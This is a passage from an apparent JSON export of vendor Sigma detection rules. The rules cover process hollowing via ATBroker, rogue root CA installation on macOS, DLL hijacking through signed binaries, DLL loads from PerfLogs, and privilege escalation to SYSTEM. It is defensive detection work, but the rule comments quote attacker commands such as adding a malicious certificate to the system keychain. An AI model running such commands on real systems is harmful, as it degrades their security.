"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074289Z",
"creation_date": "2026-03-23T11:45:34.074291Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074295Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_sacrificial_process_atbroker.yml",
"content": "title: ATBroker.exe Sacrificial Process Spawned\nid: 218a81a4-f938-453b-aa3e-57226b82c69c\ndescription: |\n Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\n This can be indicative that the binary is being used as a sacrificial or hollowed process.\n Such processes are spawned and malicious code is immediately injected into them for nefarious purposes.\n It is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\nreferences:\n - https://www.todyl.com/blog/investigating-malicious-use-onenote-deploy-qbot\n - https://attack.mitre.org/techniques/T1055/\ndate: 2025/09/02\nmodified: 2025/09/02\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.privilege_escalation\n - attack.t1055\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.SacrificialProcess\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProcessTampering\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\ATBroker.exe'\n CommandLine|endswith: '\\ATBroker.exe'\n ParentImage|contains: '?'\n\n filter_legitimate_parent:\n ParentImage: '?:\\Windows\\System32\\winlogon.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "218a81a4-f938-453b-aa3e-57226b82c69c",
"rule_name": "ATBroker.exe Sacrificial Process Spawned",
"rule_description": "Detects the suspicious execution of the legitimate ATBroker.exe Windows binary, spawned without arguments and in an abnormal execution context.\nThis can be indicative that the binary is being used as a sacrificial or hollowed process.\nSuch processes are spawned and malicious code is immediately injected into them for nefarious purposes.\nIt is recommended to investigate the parent process performing this action to determine the legitimacy of this behavior.\n",
"rule_creation_date": "2025-09-02",
"rule_modified_date": "2025-09-02",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21a54f04-8b55-4e87-95f8-60eaebb762b6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617275Z",
"creation_date": "2026-03-23T11:45:34.617277Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617281Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md",
"https://attack.mitre.org/techniques/T1553/004/"
],
"name": "t1553_004_install_root_ca.yml",
"content": "title: Root Certificate Authority Installed\nid: 21a54f04-8b55-4e87-95f8-60eaebb762b6\ndescription: |\n Detects when a new root certificate authority is added to the macOS system keychain.\n Attackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\n Root certificates are used in public key cryptography to identify a root certificate authority (CA).\n When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\n Certificates are commonly used for establishing secure TLS/SSL communications within a web browser.\n When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\n Depending on the security settings, the browser may not allow the user to establish a connection to the website.\n Installation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\n It is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md\n - https://attack.mitre.org/techniques/T1553/004/\ndate: 2022/08/29\nmodified: 2025/11/10\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.LOLBin.Security\n - classification.macOS.Behavior.DefenseEvasion\n - classification.macOS.Behavior.SystemModification\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n # security add-trusted-cert -d -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustRoot -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n # security add-trusted-cert -d -r trustAsRoot -k \"/Library/Keychains/System.keychain\" \"/Users/user/maliciousCA.crt\"\n Image: '/usr/bin/security'\n CommandLine|contains|all:\n - 'add-trusted-cert'\n - '-d'\n - '-k'\n - '/Library/Keychains/System.keychain'\n exclusion_deny:\n # security add-trusted-cert -d -r deny -k \"/Library/Keychains/System.keychain\" \"/Users/user/untrustedCA.crt\"\n CommandLine|contains|all:\n - '-r'\n - 'deny'\n\n exclusion_autofirma:\n ProcessParentCommandLine|startswith: 'sudo -s security -i add-trusted-cert -d -r * -k /library/keychains/system.keychain /users/*/library/application support/autofirma/'\n\n exclusion_cloudflarewarp:\n ProcessParentImage: '/applications/cloudflare warp.app/contents/resources/cloudflarewarp'\n\n exclusion_olfeo:\n ProcessParentImage: '/usr/local/bin/trustlane_authentication_agent'\n\n exclusion_homebrew:\n ProcessGrandparentImage: '/opt/homebrew/Cellar/mkcert/*/bin/mkcert'\n\n exclusion_make:\n ProcessGrandparentImage:\n - '/Applications/Xcode.app/Contents/Developer/usr/bin/make'\n - '/Library/Developer/CommandLineTools/usr/bin/make'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21a54f04-8b55-4e87-95f8-60eaebb762b6",
"rule_name": "Root Certificate Authority Installed",
"rule_description": "Detects when a new root certificate authority is added to the macOS system keychain.\nAttackers may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.\nRoot certificates are used in public key cryptography to identify a root certificate authority (CA).\nWhen a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.\nCertificates are commonly used for establishing secure TLS/SSL communications within a web browser.\nWhen a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk.\nDepending on the security settings, the browser may not allow the user to establish a connection to the website.\nInstallation of a root certificate on a compromised system would give an adversary a way to degrade the security of that system.\nIt is recommended to investigate the process that added the certificate and the certificate itself to determine if this action was legitimate.\n",
"rule_creation_date": "2022-08-29",
"rule_modified_date": "2025-11-10",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21a87deb-69d2-4659-9a98-c8d3b13dae95",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.097581Z",
"creation_date": "2026-03-23T11:45:34.097583Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.097587Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_control.yml",
"content": "title: DLL Hijacking via CONTROL.exe\nid: 21a87deb-69d2-4659-9a98-c8d3b13dae95\ndescription: |\n Detects potential Windows DLL Hijacking via CONTROL.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CONTROL.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\explorerframe.dll'\n - '\\mswb7.dll'\n - '\\propsys.dll'\n - '\\shell32.dll'\n - '\\structuredquery.dll'\n - '\\windows.storage.dll'\n - '\\windows.storage.search.dll'\n - '\\edputil.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files (x86)\\Mozilla Firefox\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft Office\\root\\Office*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Mozilla Firefox\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21a87deb-69d2-4659-9a98-c8d3b13dae95",
"rule_name": "DLL Hijacking via CONTROL.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CONTROL.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070008Z",
"creation_date": "2026-03-23T11:45:34.070010Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
"https://attack.mitre.org/techniques/T1036/005/"
],
"name": "t1036_005_dll_load_from_perflogs_folder.yml",
"content": "title: DLL Loaded from PerfLogs Folder\nid: 21b2686f-5620-4cbb-b0ba-f7ccc728e1f6\ndescription: |\n Detects the suspicious loading of a DLL from the PerfLogs folder.\n This folder is an uncommon directory for DLL loading and is often abused by attackers.\n It is recommended to investigate the executed binary to determine its legitimacy.\nreferences:\n - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\n - https://attack.mitre.org/techniques/T1036/005/\ndate: 2023/03/13\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.005\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Masquerading\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|startswith: '?:\\PerfLogs\\'\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21b2686f-5620-4cbb-b0ba-f7ccc728e1f6",
"rule_name": "DLL Loaded from PerfLogs Folder",
"rule_description": "Detects the suspicious loading of a DLL from the PerfLogs folder.\nThis folder is an uncommon directory for DLL loading and is often abused by attackers.\nIt is recommended to investigate the executed binary to determine its legitimacy.\n",
"rule_creation_date": "2023-03-13",
"rule_modified_date": "2025-01-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1036.005"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21c73ea5-e857-4d58-8795-052869485f7d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098193Z",
"creation_date": "2026-03-23T11:45:34.098195Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098200Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_lbtwizgi.yml",
"content": "title: DLL Hijacking via LBTWizGi.exe\nid: 21c73ea5-e857-4d58-8795-052869485f7d\ndescription: |\n Detects potential Windows DLL Hijacking via LBTWizGi.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.fortinet.com/blog/threat-research/pivnoxy-and-chinoxy-puppeteer-analysis\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/07\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LBTWizGi.exe'\n ProcessSignature: 'Logitech Inc'\n ImageLoaded|endswith: '\\LBTServ.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Logitech\\setpointp\\'\n - '?:\\Program Files (x86)\\Logitech\\setpointp\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\Logitech\\Bluetooth\\'\n - '?:\\Program Files\\Common Files\\LogiShrd\\Bluetooth\\'\n - '?:\\Program Files (x86)\\Common Files\\LogiShrd\\Bluetooth\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Company|contains: 'Logitech'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21c73ea5-e857-4d58-8795-052869485f7d",
"rule_name": "DLL Hijacking via LBTWizGi.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LBTWizGi.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Logitech executable alongside the malicious DLL.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-07",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21db6605-c463-47b7-8f9f-b912e8fc55e9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.598895Z",
"creation_date": "2026-03-23T11:45:34.598898Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.598905Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/itm4n/PrintSpoofer",
"https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/",
"https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
"https://attack.mitre.org/techniques/T1134/",
"https://attack.mitre.org/techniques/T1068/"
],
"name": "t1134_suspicious_child_process_integrity_level.yml",
"content": "title: Suspicious Child Process Integrity Level\nid: 21db6605-c463-47b7-8f9f-b912e8fc55e9\ndescription: |\n Detects a child process spawned with a SYSTEM integrity level by a parent with a lower one.\n This can be the result of an exploitation to elevate privilege to System level.\n For example, the PrintSpoofer exploitation, that abuses SeImpersonatePrivilege via Named Pipe Impersonation, can be used to achieve this type of privilege escalation.\n It is recommended to analyze both the parent process and the process itself to look for malicious content and subsequent malicious actions.\nreferences:\n - https://github.com/itm4n/PrintSpoofer\n - https://itm4n.github.io/printspoofer-abusing-impersonate-privileges/\n - https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\n - https://attack.mitre.org/techniques/T1134/\n - https://attack.mitre.org/techniques/T1068/\ndate: 2022/08/17\nmodified: 2025/10/09\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1134\n - attack.t1068\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.PrivilegeEscalation\n - classification.Windows.Behavior.Exploitation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith:\n - '\\cmd.exe'\n - '\\powershell.exe'\n IntegrityLevel: 'System'\n\n filter_parent_system:\n ParentIntegrityLevel: 'System'\n\n exclusion_unknown:\n ParentIntegrityLevel:\n - 'Unknown'\n - ''\n\n exclusion_ansible:\n CommandLine|contains:\n - 'powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -EncodedCommand CgAgACAAIAAgACYAYwBoAGMAcAAuAGMAbwBtACAANgA1ADAAMAAxACAAPgAgACQAbgB1AGwAbAAKACAAIAAgACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQAKACAAIAAgACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAIAA9ACAAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByAC4AUwBwAGwAaQB0ACgAQAAoACIAYAAwAGAAMABgADAAYAAwACIAKQAsACAAMgAsACAAWwBTAHQAcgBpAG4AZwBTAHAAbABpAHQATwBwAHQAaQBvAG4AcwBdADoAOgBSAGUAbQBvAHYAZQBFAG0AcAB0AHkARQBuAHQAcgBpAGUAcwApAAoAIAAgACAAIABTAGUAdAAtAFYAYQByAGkAYQBiAGwAZQAgAC0ATgBhAG0AZQAgAGoAcwBvAG4AXwByAGEAdwAgAC0AVgBhAGwAdQBlACAAJABzAHAAbABpAHQAXwBwAGEAcgB0AHMAWwAxAF0ACgAgACAAIAAgACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAIAAgACAAIAAmACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIACgA='\n - ' $msg = \"ANSIBLE_BOOTSTRAP_ERROR: $(ConvertTo-Json $result -Compress)\" Write-Host $msg exit -1 } }'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21db6605-c463-47b7-8f9f-b912e8fc55e9",
"rule_name": "Suspicious Child Process Integrity Level",
"rule_description": "Detects a child process spawned with a SYSTEM integrity level by a parent with a lower one.\nThis can be the result of an exploitation to elevate privilege to System level.\nFor example, the PrintSpoofer exploitation, that abuses SeImpersonatePrivilege via Named Pipe Impersonation, can be used to achieve this type of privilege escalation.\nIt is recommended to analyze both the parent process and the process itself to look for malicious content and subsequent malicious actions.\n",
"rule_creation_date": "2022-08-17",
"rule_modified_date": "2025-10-09",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1068",
"attack.t1134"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "21e24d1c-fc56-4c13-937d-8036bd091278",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.597706Z",
"creation_date": "2026-03-23T11:45:34.597711Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.597722Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logserver.yml",
"content": "title: DLL Hijacking via LogServer.exe\nid: 21e24d1c-fc56-4c13-937d-8036bd091278\ndescription: |\n Detects potential Windows DLL Hijacking via LogServer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://www.malwarebytes.com/blog/threat-intelligence/2022/winnti-apt-group-docks-in-sri-lanka-for-new-campaign-final.pdf\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/10/26\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'LogServer'\n ProcessSignature: 'Trend Micro, Inc.'\n ImageLoaded|endswith: '\\ofcpipc.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Trend Micro\\'\n - '?:\\Program Files (x86)\\Trend Micro\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Trend Micro, Inc.'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "21e24d1c-fc56-4c13-937d-8036bd091278",
"rule_name": "DLL Hijacking via LogServer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via LogServer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2216764d-df8a-4e07-bb45-54a387f5b02b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070621Z",
"creation_date": "2026-03-23T11:45:34.070624Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070630Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Scripts/Manage-bde/",
"https://attack.mitre.org/techniques/T1216/"
],
"name": "t1216_manage_bde_wsf_execution.yml",
